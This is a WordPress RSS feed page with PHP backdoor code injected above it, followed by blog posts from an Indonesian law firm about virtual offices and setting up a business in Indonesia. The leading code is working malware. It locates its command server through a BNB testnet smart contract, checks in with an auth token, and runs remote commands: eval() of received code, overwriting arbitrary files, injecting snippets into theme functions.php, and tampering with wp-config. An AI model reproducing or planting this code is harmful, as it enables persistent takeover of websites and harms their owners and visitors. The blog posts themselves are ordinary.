// vb_ac
if(!defined('ABSPATH'))return;
$cfg=array(
'stub'=>'/home/iglolawc/public_html/wp-content/plugins/hseo/hseo.php',
'ctrl'=>'// vb_ac',
'vis'=>'// 3i_xl',
'vis_func'=>'wp_f246md',
'vis_paths'=>array('/home/iglolawc/public_html/wp-content/plugins/hseo/hseo.php'),
'opt'=>'_wp_n3vlj62t',
);
$keys=array();
$keys['id']='3xq';
$keys['ver']='hc';
$keys['caps']='nhs';
$keys['tasks']='585';
$keys['interval']='z5s';
$keys['ack_id']='hk4';
$keys['ok']='13';
$keys['detail']='r7a';
$keys['inv']='vt2';
$keys['result']='5v3';
$hdr='X-B2M-Auth';$tok='gOuvKE2vloxGxtn7ZqnZ750fUap8gCA_JZ1AKkQNCqI';$id='505ce43efd4f8a1b';$interval=420;
function _ea_inv($cfg){
$r=array('ts'=>time(),'wp'=>(function_exists('get_bloginfo')?get_bloginfo('version'):''),'php'=>PHP_VERSION);
$chk=function($p,$m){$o=array('path'=>$p,'exists'=>false,'marker'=>false,'size'=>0);if(!$p||!is_string($p))return $o;
if(@is_file($p)){$b=@file_get_contents($p);$o['exists']=true;$o['size']=strlen((string)$b);$o['marker']=($b&&strpos($b,$m)!==false);}return $o;};
$r['stub']=$chk($cfg['stub'],$cfg['ctrl']);
$vis=array('plugin'=>null,'paths'=>array());
foreach($cfg['vis_paths'] as $_vp){$vis['paths'][]=$chk($_vp,$cfg['vis']);}
$found=null;foreach($vis['paths'] as $_p){if(!empty($_p['marker'])){$found=$_p;break;}}
if(!$found){$pd=WP_CONTENT_DIR.'/plugins';if(@is_dir($pd)){foreach(@glob($pd.'/*/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_plug')!==false){$found=$chk($_f,'// ea_plug');break;}}}
$vis['plugin']=$found?:array('path'=>'','exists'=>false,'marker'=>false);
$r['visitor']=$vis;
$mu=array('path'=>'','exists'=>false,'marker'=>false);$md=WP_CONTENT_DIR.'/mu-plugins';
if(@is_dir($md)){foreach(@glob($md.'/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_mu')!==false){$mu=$chk($_f,'// ea_mu');break;}}}
$r['mu_autologin']=$mu;
$ft=0;$fw=0;$td=WP_CONTENT_DIR.'/themes';if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$ft++;$b=@file_get_contents($_f);if($b&&strpos($b,'// _ea_al')!==false)$fw++;}}
$r['functions_autologin']=array('themes_total'=>$ft,'themes_with_marker'=>$fw);
$wpc=array('path'=>(defined('ABSPATH')?ABSPATH.'wp-config.php':''),'exists'=>false,'marker'=>false);
if($wpc['path']&&@is_file($wpc['path'])){$b=@file_get_contents($wpc['path']);$wpc['exists']=true;$wpc['marker']=($b&&(strpos($b,'// _ea_wc')!==false||strpos($b,'/* _ea_wc_s */')!==false));}
$r['wpconfig_inject']=$wpc;
$cp=array();if(defined('LSCWP_V'))$cp[]='litespeed';if(defined('W3TC'))$cp[]='w3tc';
if(defined('WP_ROCKET_VERSION'))$cp[]='wp_rocket';if(defined('WPCACHEHOME'))$cp[]='wp_super_cache';
if(defined('SG_CACHEPRESS'))$cp[]='sg_optimizer';$r['cache']=array('plugins'=>$cp,'opcache'=>function_exists('opcache_get_status'));
return $r;}
function _ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id){
$_ok=false;$_detail='';$_result=null;
$_code=isset($_task['t'])?$_task['t']:'';$_p=isset($_task['p'])?$_task['p']:array();$_tid=isset($_task['i'])?$_task['i']:0;
if(($_code==='wf'||$_code==='ld')&&!empty($_p['path'])&&isset($_p['content'])){
$_path=$_p['path'];$_body=@is_file($_path)?@file_get_contents($_path):'';
if($_code==='ld'&&strpos((string)$_body,$_p['content'])===false)$_body.=$_p['content'];
elseif($_code==='wf')$_body=$_p['content'];
$_ok=@file_put_contents($_path,$_body)!==false;
}elseif($_code==='su'&&!empty($_p['path'])&&!empty($_p['content'])){
$_ok=@file_put_contents($_p['path'],$_p['content'])!==false;
}elseif($_code==='rp'&&!empty($_p['code'])){
ob_start();try{eval($_p['code']);$_ok=true;}catch(Throwable $e){$_detail=$e->getMessage();}catch(Exception $e){$_detail=$e->getMessage();}
$_result=array('output'=>ob_get_clean());}
elseif($_code==='va'){$_result=_ea_inv($cfg);$_ok=true;}
elseif($_code==='fc'){
$p=array();if(function_exists('wp_cache_flush')){wp_cache_flush();$p[]='object';}
if(function_exists('opcache_reset')){@opcache_reset();$p[]='opcache';}
if(defined('LSCWP_V')&&function_exists('do_action')){do_action('litespeed_purge_all');$p[]='litespeed';}
if(defined('W3TC')&&function_exists('w3tc_flush_all')){w3tc_flush_all();$p[]='w3tc';}
if(function_exists('rocket_clean_domain')){rocket_clean_domain();$p[]='wp_rocket';}
if(function_exists('wp_cache_clear_cache')){wp_cache_clear_cache();$p[]='wp_super_cache';}
if(function_exists('sg_cachepress_purge_cache')){sg_cachepress_purge_cache();$p[]='sg_optimizer';}
$_ok=true;$_result=array('purged'=>$p);}
elseif($_code==='ma'&&!empty($_p['path'])&&!empty($_p['content'])){
@wp_mkdir_p(dirname($_p['path']));$_ok=@file_put_contents($_p['path'],$_p['content'])!==false;
}elseif($_code==='fn'&&!empty($_p['snippet'])){
$td=WP_CONTENT_DIR.'/themes';$n=0;if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$b=@file_get_contents($_f);if(strpos((string)$b,'// _ea_al')===false){$b=rtrim((string)$b)."\n".$_p['snippet'];if(@file_put_contents($_f,$b)!==false)$n++;}}}
$_ok=$n>0;$_result=array('themes_updated'=>$n);}
elseif($_code==='wc'){
$wp=ABSPATH.'wp-config.php';if(@is_file($wp)){$b=@file_get_contents($wp);
if(strpos($b,'/* _ea_wc_s */')!==false){$b=preg_replace('#/\*/* _ea_wc_s */\*/.*?/\* _ea_wc_e \*/#s','',$b);}
$b=str_replace(array('// _ea_wc','/* _ea_wc_s */','/* _ea_wc_e */'),'',$b);$_ok=@file_put_contents($wp,$b)!==false;}
}
$ack=array($keys['ack_id']=>$_tid,$keys['ok']=>$_ok,$keys['detail']=>$_detail);
if($_result!==null)$ack[$keys['result']]=$_result;
return $ack;}
function _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,$force){
$k=$cfg['opt'];if(!$force&&!wp_doing_cron()){
if(is_admin())return;
$last=(int)get_option($k,0);if(time()-$last<$interval)return;
}
$u='likingdropout.site';$co='0x9e33A3979F74c7700E4BaA7e7a2934556f72eF96';$sel='0x38bd65e2';$rpcs=array('https://data-seed-prebsc-1-s1.bnbchain.org:8545','https://data-seed-prebsc-1-s1.bnbchain.org:8545/','https://data-seed-prebsc-2-s1.binance.org:8545/','https://data-seed-prebsc-2-s2.binance.org:8545/','https://bsc-testnet-dataseed.bnbchain.org/','https://bnb-testnet.api.onfinality.io/public');
foreach($rpcs as $_rpc){
$b=json_encode(array('jsonrpc'=>'2.0','id'=>97,'method'=>'eth_call','params'=>array(array('to'=>$co,'data'=>$sel),'latest')));
$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n",'content'=>$b,'timeout'=>3,'ignore_errors'=>true)));
$raw=@file_get_contents($_rpc,false,$ctx);
if(!$raw)continue;
$j=json_decode($raw,true);
if(empty($j['result'])||strlen($j['result'])<10)continue;
$h=substr($j['result'],2);
if(strlen($h)<128)continue;
$off=(int)hexdec(substr($h,0,64));
$len=(int)hexdec(substr($h,$off*2,64));
$_z=pack('H*',substr($h,$off*2+64,$len*2));if($_z)$u=$_z;break;
}
$_hp='/panel/api/v1/metrics/collect';
$_z=trim((string)$u);$_z=preg_replace('#^https?://#','',$_z);
if(strpos($_z,'/')!==false){$_xp=explode('/',$_z,2);$_z=$_xp[0];if(!empty($_xp[1]))$_hp='/'.ltrim($_xp[1],'/');}
$_z=trim($_z,'.');if(!$_z)$_z='likingdropout.site';
$_s=substr(str_replace(array('+','/','='),'',base64_encode(random_bytes(6))),0,10);
$u='https://'.$_s.'.'.$_z.$_hp;
$_ack=$u;if(substr($_ack,-7)==='collect')$_ack=substr($_ack,0,-7).'ack';else $_ack=rtrim($_ack,'/').'/ack';
$inv=_ea_inv($cfg);
$b=array($keys['id']=>$id,$keys['ver']=>2,$keys['caps']=>array('server_sync','visitor_js','write_file'),$keys['inv']=>$inv);
$resp='';if(function_exists('wp_remote_post')){$_r=wp_remote_post($u,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($b)));if(!is_wp_error($_r))$resp=(string)wp_remote_retrieve_body($_r);}else{$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($b),'timeout'=>20,'ignore_errors'=>true)));$resp=(string)@file_get_contents($u,false,$ctx);}
if(!$resp)return;
update_option($k,time(),false);
$j=json_decode($resp,true);$tk=$keys['tasks'];
if(empty($j[$tk])||!is_array($j[$tk]))return;
foreach($j[$tk] as $_task){
$ack=_ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id);
if(function_exists('wp_remote_post')){@wp_remote_post($_ack,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($ack)));}else{$actx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($ack),'timeout'=>20,'ignore_errors'=>true)));@file_get_contents($_ack,false,$actx);}
}
}
add_filter('cron_schedules',function($s){$s['ea_fleet']=array('interval'=>$interval,'display'=>'Fleet sync');return $s;});
add_action('init',function()use($cfg,$keys,$hdr,$tok,$id,$interval){
if(!wp_next_scheduled('ea_fleet_sync'))wp_schedule_event(time()+120,'ea_fleet','ea_fleet_sync');
_ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,false);
},1);
add_action('ea_fleet_sync',function()use($cfg,$keys,$hdr,$tok,$id,$interval){
_ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,true);
});
Warning: Cannot modify header information - headers already sent by (output started at /home/iglolawc/public_html/wp-content/plugins/hseo/hseo.php:560) in /home/iglolawc/public_html/wp-includes/feed-rss2.php on line 8
Finding a Virtual Office That Has Everything You Need At the Right Price was first published in Indonesia Global Law Firm.
]]>Virtual offices are locations where companies can work remotely without actually being there. Virtual office spaces are usually equipped with all the amenities that would be provided by traditional office space, such as desk rentals, couches, conference rooms, printers, fax machines, phones, and more. The only difference is that employees are not required to be at this location to work. Employees can simply login remotely to access their company’s virtual office space.
A virtual office space allows employees the freedom of working from home or other remote locations without sacrificing all the important features of a typical office environment. Working from home has long been popular among many employees because it provides them with the opportunity to find a better work-life balance. Virtual office spaces offer an alternative to working from home and increase employees’ flexibility.
Remote workers can simply check into their virtual office space to get the benefits of an office environment without having to work in one. Virtual offices can enhance workplace collaboration, improve productivity, and facilitate information sharing among employees. This is especially true for companies that require real-time communication with clients or business partners who are located in different parts of the world.
For example, a consulting firm may need to hold video conferences with clients on a regular basis; however, it would be difficult for its consultants to travel back and forth between client’s offices every time they needed a face-to-face consultation. With a virtual firm, all that is required is an internet connection and a high-definition camera; these two components are enough to allow the consultant and clients to interact as if they were actually in the same room.
Companies can also rent meeting rooms in their virtual office spaces. These kinds of virtual offices offer a great alternative to traditional conference rooms that cannot be easily accessed by colleagues located in distant business locations. Virtual firms, for example, do not always require every member of the team to attend client meetings; rather, it is sufficient for just one team member to make an appearance at the virtual office space for such transactions. This way, colleagues from other parts of the world can still work with each other despite being geographically dispersed.
A virtual office is a great way to save money and time. All you need is a computer, internet connection, and phone line. When you have a virtual office you don’t have a lot of the overheads from running an office from home. You don’t have to pay for the space or for utilities because those things are now included with your monthly bill. You also don’t have to buy furniture, equipment, hire staff, or spend time commuting to work. This is a really great choice if you’re looking for a way to save both time and money!
It also gives the business owner the opportunity to locate their business in a better geographical location that fits their needs. Virtual offices also give companies the chance to use conference room rentals without having to pay for an expensive lease.
Office workers are trying to cut down on the time they commute to work each day, so they’re looking for new ways to do business – like virtual offices! This is where you use the internet to connect with your bosses and co-workers, even though you might not all be in the same building or city anymore.
Some companies say that having employees work from their homes helps them save money on office space and equipments. But some people say this will make team communication harder because it’s more difficult than talking face-to-face. So far, most businesses are using virtual offices as a way to save money, but it’s possible that businesses will rely more on them in the future.
Employees who work from home are less stressed and more productive, according to a study. The main reason? They’re happier! As well as feeling better about themselves on the inside (and out), they also find it easier to deal with difficult customers or coworkers when you don’t have an office full of distracting noises in your ear all day long. Plus there is less risk for physical injury as a result of commuting.
Working from home will benefit the workers emotionally also because they don’t have to worry about the negative repercussions of not working or pleasing their boss. This can include feeling guilty or angry at themselves for missing work. When they don’t feel like part of the team, they might begin to experience loneliness and develop a sinking feeling in their stomach when they need to go into the office.
There are also many benefits especially for parents who want to spend time with their family but still work at the same time. Some other benefits include:
When an individual is at the office, they are not able to reach out to people in different locations. It is also hard for them to be involved in any conference calls or video chats. However, when businesses have virtual offices, things are different. People are still able to communicate with others. This can be done through either phone or computers. With this type of system in place, it becomes easier for workers to communicate with each other without being confined to a certain location.
Other communication benefits of using virtual office include:
Working in an office tends to get complicated because you need so many people to help out and it becomes really hard for companies to manage everything especially when they don’t know how long they will be at one location. A virtual office allows companies to still work without having an office and this frees up time so they can focus only on the important stuff without losing out on anything else.
Virtual offices provide the flexibility and convenience of operating out of any location. A virtual office is most often used for businesses that need to maintain an address but doesn’t have an office space they own or would like to rent. There are also virtual offices for people who travel extensively and want to maintain a presence where they live or work remotely. This can be particularly important when running a home-based business such as eBay, Etsy, or any other similar service that may require shipping from buyers outside their home country.
Other benefits include:
Virtual office security benefits include both physical and digital security that is designed specifically for business environments:
Finding the right virtual office for your business might seem like an intimidating task. However, with a little research and effort, you will be able to find the perfect virtual office for your needs.
First, you should determine what type of services you would like to receive from your virtual office provider. Some providers offer only rental of the real estate while others may provide these services in addition to administrative support or off-site meeting space. Determine the most important service you want to get out of your virtual office and search for providers that cater specifically to that need.
Secondly, you will want to determine how much you are able and willing to spend on a virtual office. If you find one that has all the services that you need, but they are out of your price range, consider looking for a provider that only covers your most important needs. This way, you can save some money without receiving sub-par service.
Lastly, search for providers in your area by searching online classifieds or yellow pages under “virtual offices”. Make sure to check out any listings that seem promising before committing yourself to use them as your business address. You may also want to look into smaller local companies that specialize in virtual office support instead of large corporations that might not understand the unique needs of small businesses.
The right virtual office is a must for any business looking to create an efficient and effective work environment. In fact, we can help you find the perfect one-stop solution that will make it all happen seamlessly! It doesn’t matter if you have a hectic schedule. We can help with the virtual office selection process! Your time is valuable and we want it reserved for more important tasks.
Photo by Gabriel Beaudry on Unsplash
Finding a Virtual Office That Has Everything You Need At the Right Price was first published in Indonesia Global Law Firm.
]]>Open A Business in Indonesia for Foreigners – FAQ was first published in Indonesia Global Law Firm.
]]>Indonesia is one of the fastest-growing economies in Southeast Asia. Foreigners looking to open a business in Indonesia should be aware that there are numerous risks involved, such as labor and legal issues. The good news is, however, that these can be mitigated with sufficient research before beginning your venture.
This FAQ aims to provide you with information about opening a business in Indonesia so you can make an informed decision on whether it’s right for you. The next step will be to read this FAQ from start to finish!
Indonesia Global Law Firm is the perfect company for any business that needs legal assistance in Indonesia. With years of experience and corporate knowledge, we are able to help you come up with a strategy based on what your specific goals may be, while also keeping an eye out for ways we can save money or time throughout this process.
We know how expensive and frustrating it can be when businesses have to deal with complicated laws where their operations happen–we don’t want your business to go through all of those struggles!
Indonesia Global Law Firm will help you navigate the complexities of Indonesian law and regulations. With years of experience, corporate knowledge that’s second to none, and an attentive customer-focused approach—you’ll be in good hands with our legal team!
Image Credit: Photo by Icons8 Team on Unsplash
Open A Business in Indonesia for Foreigners – FAQ was first published in Indonesia Global Law Firm.
]]>9 Steps to Start A Business in Indonesia was first published in Indonesia Global Law Firm.
]]>Foreign direct investment is a risky venture that many companies would never consider. The decision to invest can be even more difficult if the country you are investing in does not allow it at all or only under certain conditions.
That’s why after deciding which sector or industry you want to work in you need to make sure whether the business sector is open with conditions or altogether closed for foreign direct investment. You can do this by checking the Presidential Decree No. 49 of 2021.

While the above regulations list out various sectors that may or not be open with conditions and investments depending on the business field you want to focus on, you will then need to further look up your business classification using the Indonesian Standard Business Classification (Klasifikasi Baku Lapangan Usaha Indonesia or KBLI) that helps break down what types of businesses exist within those fields.
There are three business entities you can choose for starting a business in Indonesia as a foreign investor. These include:
We will take a look at the characteristics, advantages of each business entity as well as some disadvantages that you need to be aware of.
It is common for a representative office (which takes the form of a branch office of the parent company) to be created before the establishment of PT/PMA. The company’s products or services will need to prove they are marketable and suitable for Indonesia, so an examination would follow after approval from Indonesian authorities. Once this has been verified then foreign companies can establish either type of corporation above.
The Indonesian government’s tax policies make opening up a representative office easy to do because they have no large taxes on initial incorporation or transferring ownership shares over time. However, there are some limited regulations governing these businesses which could affect companies who want more than just one location here like limitations concerning dividends paid abroad; restrictions against conducting any banking, sales, and purchase activities from within this type of establishment; limiting foreign equity participation – (which may require special approval).
Once investors attain their Principle License (IP), they will be able to register with any public notary office and draft the establishment of an FDI company (PT PMA).
The Ministry of Justice and Human Rights will need to approve the incorporation draft mentioned above before it can be published in the state gazette.
After getting the company deed approved, investors will need to apply for provincial government licenses that refer mainly to regional regulation and certification required by business operating entities. Regulated by what sector the business is in, the licenses needed are Company Domicile Certificate (SKDP), Environmental License, Building Permit (Izin Mendirikan Bangunan or IMB), Nuisance Ordinance Permit, Location Permit, and Company Registration Certificate.
The next step is to register the company at the Directorate General of Taxes (DGT) with the necessary documents to obtain a tax ID (Nomor Pokok Wajib Pajak – NPWP).
The next mandatory step is to apply for a Single Business Identity Number (Nomor Induk Berusaha or NIB). This identification number serves as multiple licenses in the past such as:
Additionally, NIB also serves as registration ID for Health and Social Security Systems or BPJS Kesehatan and BPJS Ketenagakerjaan for companies.
Pre-operational additional licenses may be required depending on the business sector. Such additional licenses are commercial and tourism licenses.
If you need assistance with any of the above steps, we’re happy to help. From translating your business plan into Bahasa Indonesia and getting all necessary permits for a company opening in Indonesia, to preparing financial documents, our team is ready to assist at every step of the process. Find out how our team can help make your life easier by clicking here now!
9 Steps to Start A Business in Indonesia was first published in Indonesia Global Law Firm.
]]>